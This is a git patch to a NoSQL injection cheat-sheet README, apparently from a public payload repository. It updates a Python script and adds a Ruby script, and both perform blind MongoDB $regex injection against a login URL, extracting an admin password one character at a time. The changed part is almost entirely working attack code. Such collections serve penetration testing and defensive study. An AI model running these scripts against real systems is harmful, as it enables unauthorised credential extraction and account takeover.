From 7e2fa15462fa8b9e8dfb0215c4ad4b4f4e81f248 Mon Sep 17 00:00:00 2001
From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com>
Date: Fri, 23 Sep 2022 00:36:41 +0200
Subject: [PATCH] Blind NoSQL scripts

- add missing menu item
- use better string interpolation for python script
- add ruby script
---
 NoSQL Injection/README.md | 39 ++++++++++++++++++++++++++++++++++++---
 1 file changed, 36 insertions(+), 3 deletions(-)

diff --git a/NoSQL Injection/README.md b/NoSQL Injection/README.md
index 5ae3a78..12fbf15 100644
--- a/NoSQL Injection/README.md	
+++ b/NoSQL Injection/README.md	
@@ -11,6 +11,7 @@
   * [Extract data information](#extract-data-information)
 * [Blind NoSQL](#blind-nosql)
   * [POST with JSON body](#post-with-json-body)
+  * [POST with urlencoded body](#post-with-urlencoded-body)
   * [GET](#get)
 * [MongoDB Payloads](#mongodb-payloads)
 * [References](#references)
@@ -84,6 +85,7 @@ Extract data with "in"
 
 ### POST with JSON body
 
+python script:
 
 ```python
 import requests
@@ -109,6 +111,8 @@ while True:
 
 ### POST with urlencoded body
 
+python script:
+
 ```python
 import requests
 import urllib3
@@ -133,6 +137,8 @@ while True:
 
 ### GET
 
+python script:
+
 ```python
 import requests
 import urllib3
@@ -147,13 +153,40 @@ u='http://example.org/login'
 while True:
   for c in string.printable:
     if c not in ['*','+','.','?','|', '#', '&', '$']:
-      payload='?username=%s&password[$regex]=^%s' % (username, password + c)
+      payload=f"?username={username}&password[$regex]=^{password + c}"
       r = requests.get(u + payload)
       if 'Yeah' in r.text:
-        print("Found one more char : %s" % (password+c))
+        print(f"Found one more char : {password+c}")
         password += c
 ```
 
+ruby script:
+
+```ruby
+require 'httpx'
+
+username = 'admin'
+password = ''
+url = 'http://example.org/login'
+# CHARSET = (?!..?~).to_a # all ASCII printable characters
+CHARSET = [*'0'..'9',*'a'..'z','-'] # alphanumeric + '-'
+GET_EXCLUDE = ['*','+','.','?','|', '#', '&', '$']
+session = HTTPX.plugin(:persistent)
+
+while true
+  CHARSET.each do |c|
+    unless GET_EXCLUDE.include?(c)
+      payload = "?username=#{username}&password[$regex]=^#{password + c}"
+      res = session.get(url + payload)
+      if res.body.to_s.match?('Yeah')
+        puts "Found one more char : #{password + c}"
+        password += c
+      end
+    end
+  end
+end
+```
+
 ## MongoDB Payloads
 
 ```bash
@@ -185,4 +218,4 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
 * [Testing for NoSQL injection - OWASP/WSTG](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection)
 * [NoSQL injection wordlists - cr0hn](https://github.com/cr0hn/nosqlinjection_wordlists)
 * [NoSQL Injection in MongoDB - JUL 17, 2016 - Zanon](https://zanon.io/posts/nosql-injection-in-mongodb)
-* [Burp-NoSQLiScanner](https://github.com/matrix/Burp-NoSQLiScanner/blob/main/src/burp/BurpExtender.java)
\ No newline at end of file
+* [Burp-NoSQLiScanner](https://github.com/matrix/Burp-NoSQLiScanner/blob/main/src/burp/BurpExtender.java)